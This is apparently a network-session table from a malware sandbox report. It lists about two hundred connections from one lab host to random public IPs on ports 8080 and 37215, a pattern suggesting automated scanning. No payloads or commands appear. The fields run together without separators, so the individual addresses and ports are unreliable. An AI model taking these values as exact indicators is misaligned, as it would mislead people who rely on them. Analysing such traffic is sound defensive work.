                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9006192.168.2.2358356144.214.15.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9007192.168.2.2351592221.130.166.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9008192.168.2.234127475.51.3.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9009192.168.2.2350604145.250.183.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9010192.168.2.2335518166.230.20.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9011192.168.2.2350698154.154.186.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9012192.168.2.2357920217.92.244.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9013192.168.2.2337850164.162.128.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9014192.168.2.2355252195.189.176.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9015192.168.2.2352686196.160.194.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9016192.168.2.2354594186.138.222.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9017192.168.2.2343774109.150.141.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9018192.168.2.2351688163.196.167.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9019192.168.2.2339762103.187.70.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9020192.168.2.235536266.150.1.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9021192.168.2.2357188152.206.217.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9022192.168.2.234586645.115.183.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9023192.168.2.234286027.66.57.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9024192.168.2.235991450.103.149.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9025192.168.2.2352644174.247.88.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9026192.168.2.234971219.173.62.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9027192.168.2.2358756167.45.168.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9028192.168.2.2333050104.52.216.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9029192.168.2.235950462.167.147.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9030192.168.2.235544823.66.208.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9031192.168.2.234140875.140.234.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9032192.168.2.233357414.75.34.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9033192.168.2.2339146192.39.50.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9034192.168.2.2334952211.202.193.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9035192.168.2.2344614152.167.112.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9036192.168.2.2335954100.30.44.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9037192.168.2.235703034.136.189.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9038192.168.2.2346678155.121.60.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9039192.168.2.233426474.136.134.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9040192.168.2.2342950183.247.245.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9041192.168.2.233923496.105.34.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9042192.168.2.2338308211.221.155.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9043192.168.2.2341584154.240.147.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9044192.168.2.2340366115.226.192.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9045192.168.2.234376052.253.112.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9046192.168.2.234321657.193.17.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9047192.168.2.233813668.19.73.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9048192.168.2.2343794132.114.137.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9049192.168.2.235134874.11.65.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9050192.168.2.2344842158.98.35.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9051192.168.2.2336334108.78.167.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9052192.168.2.2359852110.130.62.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9053192.168.2.2337568126.31.68.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9054192.168.2.235457439.128.251.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9055192.168.2.2349760140.93.232.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9056192.168.2.2352842118.86.114.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9057192.168.2.2345368121.102.72.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9058192.168.2.234551832.22.250.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9059192.168.2.2336524169.139.97.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9060192.168.2.233768449.193.204.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9061192.168.2.23553262.237.226.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9062192.168.2.233606649.9.122.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9063192.168.2.233754447.182.107.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9064192.168.2.2358880209.50.101.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9065192.168.2.2334632149.192.87.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9066192.168.2.235000460.214.147.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9067192.168.2.234979281.88.174.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9068192.168.2.234488072.164.105.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9069192.168.2.233348638.68.251.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9070192.168.2.2342990160.126.173.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9071192.168.2.23591728.40.23.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9072192.168.2.233303063.91.156.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9073192.168.2.234697066.241.106.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9074192.168.2.2356384103.79.27.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9075192.168.2.233511294.120.167.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9076192.168.2.235540867.141.9.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9077192.168.2.2348750137.114.84.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9078192.168.2.2349196132.239.11.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9079192.168.2.2352930149.181.215.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9080192.168.2.233702094.217.182.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9081192.168.2.2333130184.182.239.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9082192.168.2.2333886186.0.81.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9083192.168.2.234842885.248.73.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9084192.168.2.233355274.127.187.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9085192.168.2.235880452.64.56.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9086192.168.2.2347230101.15.163.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9087192.168.2.2345572207.39.191.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9088192.168.2.234224264.246.246.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9089192.168.2.2357562177.184.160.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9090192.168.2.234880676.192.181.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9091192.168.2.235319232.179.46.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9092192.168.2.235376894.101.12.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9093192.168.2.2351846221.58.44.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9094192.168.2.233786663.112.205.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9095192.168.2.2332908159.110.87.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9096192.168.2.235780276.154.170.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9097192.168.2.234131488.16.109.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9098192.168.2.234336440.42.137.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9099192.168.2.2355352145.49.54.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9100192.168.2.2357014175.1.231.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9101192.168.2.2358886143.145.54.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9102192.168.2.234248069.22.11.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9103192.168.2.2351856220.250.212.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9104192.168.2.2332952121.58.65.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9105192.168.2.234786619.116.159.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9106192.168.2.233838018.22.214.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9107192.168.2.235530017.255.218.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9108192.168.2.2344414111.101.27.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9109192.168.2.2333632157.198.77.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9110192.168.2.2342682197.2.217.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9111192.168.2.2341008197.28.127.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9112192.168.2.2359002189.141.141.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9113192.168.2.2337098103.33.11.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9114192.168.2.234924641.5.172.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9115192.168.2.2356362197.205.215.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9116192.168.2.2354562157.233.87.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9117192.168.2.2347052197.108.97.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9118192.168.2.2337602197.169.49.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9119192.168.2.2343584197.224.150.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9120192.168.2.233836241.230.234.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9121192.168.2.234077037.238.139.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9122192.168.2.2348696197.153.10.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9123192.168.2.2336818157.80.157.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9124192.168.2.234206241.103.233.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9125192.168.2.235129063.200.204.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9126192.168.2.233282242.205.111.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9127192.168.2.2356526110.89.22.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9128192.168.2.233612860.18.96.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9129192.168.2.2345760196.191.8.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9130192.168.2.234800490.235.73.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9131192.168.2.2340674136.51.23.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9132192.168.2.2336002100.253.34.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9133192.168.2.2357268128.59.173.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9134192.168.2.2342568139.107.142.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9135192.168.2.233939273.234.174.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9136192.168.2.2360568108.217.178.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9137192.168.2.2354770202.209.154.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9138192.168.2.2335694109.118.249.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9139192.168.2.235491094.18.94.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9140192.168.2.2343222187.212.79.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9141192.168.2.2350918184.246.34.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9142192.168.2.233500045.8.160.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9143192.168.2.2334600160.97.80.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9144192.168.2.2342262186.227.144.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9145192.168.2.2335722188.16.81.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9146192.168.2.2359154131.231.249.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9147192.168.2.2344672170.45.148.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9148192.168.2.235550293.87.166.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9149192.168.2.2343368171.72.105.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9150192.168.2.2345084122.222.144.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9151192.168.2.2356524171.114.4.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9152192.168.2.2346926119.77.84.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9153192.168.2.234610098.14.94.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9154192.168.2.235656658.189.115.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9155192.168.2.2339768198.29.32.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9156192.168.2.233712265.105.126.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9157192.168.2.2350592176.57.52.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9158192.168.2.235283497.243.124.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9159192.168.2.23331601.134.207.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9160192.168.2.2353434171.21.190.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9161192.168.2.234492889.64.233.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9162192.168.2.2338608194.191.255.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9163192.168.2.2342024118.252.191.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9164192.168.2.2337848114.229.49.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9165192.168.2.2359430142.218.72.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9166192.168.2.2341284212.246.189.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9167192.168.2.2359956158.201.242.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9168192.168.2.234193094.27.101.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9169192.168.2.234692098.55.170.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9170192.168.2.235934619.120.35.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9171192.168.2.2359552211.20.68.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9172192.168.2.234772660.44.199.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9173192.168.2.235903617.121.228.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9174192.168.2.2338164188.55.242.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9175192.168.2.2357610155.193.51.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9176192.168.2.235932654.56.241.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9177192.168.2.2359240130.107.38.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9178192.168.2.2333076151.140.108.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9179192.168.2.23374585.178.195.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9180192.168.2.2346938123.36.190.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9181192.168.2.234872024.221.79.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9182192.168.2.2341022121.192.242.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9183192.168.2.2353396223.16.128.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9184192.168.2.2332780220.91.154.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9185192.168.2.2350788181.197.101.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9186192.168.2.233448258.178.187.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9187192.168.2.2360670194.107.235.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9188192.168.2.233767060.19.34.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9189192.168.2.2346878190.115.166.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9190192.168.2.2340458206.219.65.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9191192.168.2.2357334166.139.142.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9192192.168.2.235266292.216.112.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9193192.168.2.234416613.220.20.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9194192.168.2.235993470.69.135.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9195192.168.2.2343076223.202.127.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9196192.168.2.235166088.52.197.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9197192.168.2.2350106157.44.198.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9198192.168.2.2350752111.44.60.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9199192.168.2.2349464176.19.85.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9200192.168.2.23499705.22.247.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9201192.168.2.2339312203.41.244.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9202192.168.2.2358908167.135.161.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9203192.168.2.2352866193.224.3.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9204192.168.2.233769224.206.199.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9205192.168.2.234448884.162.21.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9206192.168.2.2340588112.150.212.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9207192.168.2.2338948190.94.148.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9208192.168.2.2332896190.66.72.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9209192.168.2.2342312221.223.176.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9210192.168.2.2355976148.4.123.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9211192.168.2.2359744208.194.37.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9212192.168.2.235046272.6.59.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9213192.168.2.235695691.98.159.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9214192.168.2.236036490.213.235.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9215192.168.2.2355250200.180.182.318080
                                                        TimestampBytes transferredDirectionData


